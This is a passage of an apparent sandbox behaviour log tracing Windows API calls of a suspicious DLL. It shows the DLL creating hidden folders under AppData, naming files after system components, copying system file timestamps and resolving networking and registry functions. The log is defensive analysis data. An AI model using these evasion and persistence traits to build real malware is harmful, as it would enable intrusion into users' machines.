(dwErrCode=0x0) [0032.538] GetLastError () returned 0x0 [0032.538] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.539] GetLastError () returned 0x0 [0032.539] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.540] SetLastError (dwErrCode=0x0) [0032.540] GetLastError () returned 0x0 [0032.547] SetLastError (dwErrCode=0x0) [0032.547] GetLastError () returned 0x0 [0032.547] SetLastError (dwErrCode=0x0) [0032.547] GetLastError () returned 0x0 [0032.547] SetLastError (dwErrCode=0x0) [0032.547] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.548] SetLastError (dwErrCode=0x0) [0032.548] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.549] SetLastError (dwErrCode=0x0) [0032.549] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.550] SetLastError (dwErrCode=0x0) [0032.550] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.551] SetLastError (dwErrCode=0x0) [0032.551] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.552] SetLastError (dwErrCode=0x0) [0032.552] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.553] SetLastError (dwErrCode=0x0) [0032.553] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.554] SetLastError (dwErrCode=0x0) [0032.554] GetLastError () returned 0x0 [0032.555] SetLastError (dwErrCode=0x0) [0032.555] GetLastError () returned 0x0 [0032.555] SetLastError (dwErrCode=0x0) [0032.555] GetLastError () returned 0x0 [0032.555] SetLastError (dwErrCode=0x0) [0032.555] GetLastError () returned 0x0 [0032.555] SetLastError (dwErrCode=0x0) [0032.555] GetLastError () returned 0x0 [0032.555] SetLastError (dwErrCode=0x0) [0032.555] GetLastError () returned 0x0 [0032.555] SetLastError (dwErrCode=0x0) [0032.555] GetLastError () returned 0x0 [0032.555] SetLastError (dwErrCode=0x0) [0032.555] GetLastError () returned 0x0 [0032.555] SetLastError (dwErrCode=0x0) [0032.555] GetLastError () returned 0x0 [0032.555] SetLastError (dwErrCode=0x0) [0032.556] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x761d0000 [0032.556] GetProcAddress (hModule=0x761d0000, lpProcName="IsProcessorFeaturePresent") returned 0x762276b5 [0032.556] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0032.557] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fa50 | out: lpSystemTimeAsFileTime=0x14fa50*(dwLowDateTime=0xe121e390, dwHighDateTime=0x1d3dfba)) [0032.557] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f988, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.557] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f870, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.557] GetLastError () returned 0x0 [0032.557] GetLastError () returned 0x0 [0032.557] GetLastError () returned 0x0 [0032.557] GetLastError () returned 0x0 [0032.557] GetLastError () returned 0x0 [0032.557] GetLastError () returned 0x0 [0032.557] GetLastError () returned 0x0 [0032.557] GetLastError () returned 0x0 [0032.557] GetLastError () returned 0x0 [0032.557] GetLastError () returned 0x0 [0032.558] GetLastError () returned 0x0 [0032.558] GetLastError () returned 0x0 [0032.558] GetLastError () returned 0x0 [0032.558] GetLastError () returned 0x0 [0032.558] GetLastError () returned 0x0 [0032.558] GetLastError () returned 0x0 [0032.558] GetLastError () returned 0x0 [0032.558] GetLastError () returned 0x0 [0032.558] GetLastError () returned 0x0 [0032.558] GetSystemDirectoryA (in: lpBuffer=0x72f1e74c, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.558] wsprintfA (in: param_1=0x72f1e74c, param_2="%s\\" | out: param_1="C:\\Windows\\system32\\") returned 20 [0032.558] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.558] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.558] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe")) returned 0x22 [0032.558] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.558] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP") returned 37 [0032.558] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help"), lpSecurityAttributes=0x0) returned 0 [0032.558] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\") returned 47 [0032.558] CreateDirectoryA (lpPathName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\system32\\" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\help\\system32"), lpSecurityAttributes=0x0) returned 0 [0032.558] GetLastError () returned 0xb7 [0032.558] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x72f1e648, nSize=0x104 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x20 [0032.558] wsprintfA (in: param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0032.558] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0032.558] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0032.559] wsprintfA (in: param_1=0x14f6f0, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.559] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0032.559] wsprintfA (in: param_1=0x14f5ec, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0032.559] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.559] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0032.559] CloseHandle (hObject=0x74) returned 1 [0032.559] GetLastError () returned 0x0 [0032.559] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0032.559] GetLastError () returned 0x0 [0032.559] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0032.559] GetSystemDirectoryA (in: lpBuffer=0x14f6f0, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0032.559] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0032.559] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0032.559] CloseHandle (hObject=0x74) returned 1 [0032.559] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.560] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.560] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0032.561] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0032.561] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0032.561] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0032.561] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0032.561] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0032.561] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0032.561] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0032.561] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0032.561] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0032.561] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0032.561] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0032.561] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0032.562] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0032.563] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0032.563] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0032.563] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0032.563] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0032.563] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0032.563] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0032.563] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0032.563] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0032.563] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0032.563] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0032.563] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0032.563] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0032.563] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0032.563] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0032.563] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0032.563] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0032.564] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0032.564] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0032.564] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0032.564] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0032.565] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.565] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.565] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0032.565] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0032.566] HeapDestroy (hHeap=0x13b0000) returned 1 Process: id = "24" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4f960" os_pid = "0xb70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=Entry /fn_args=\"1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1147 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1148 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1149 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1150 start_va = 0x170000 end_va = 0x26ffff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 1151 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1152 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1153 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1154 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1155 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 1156 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1157 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id 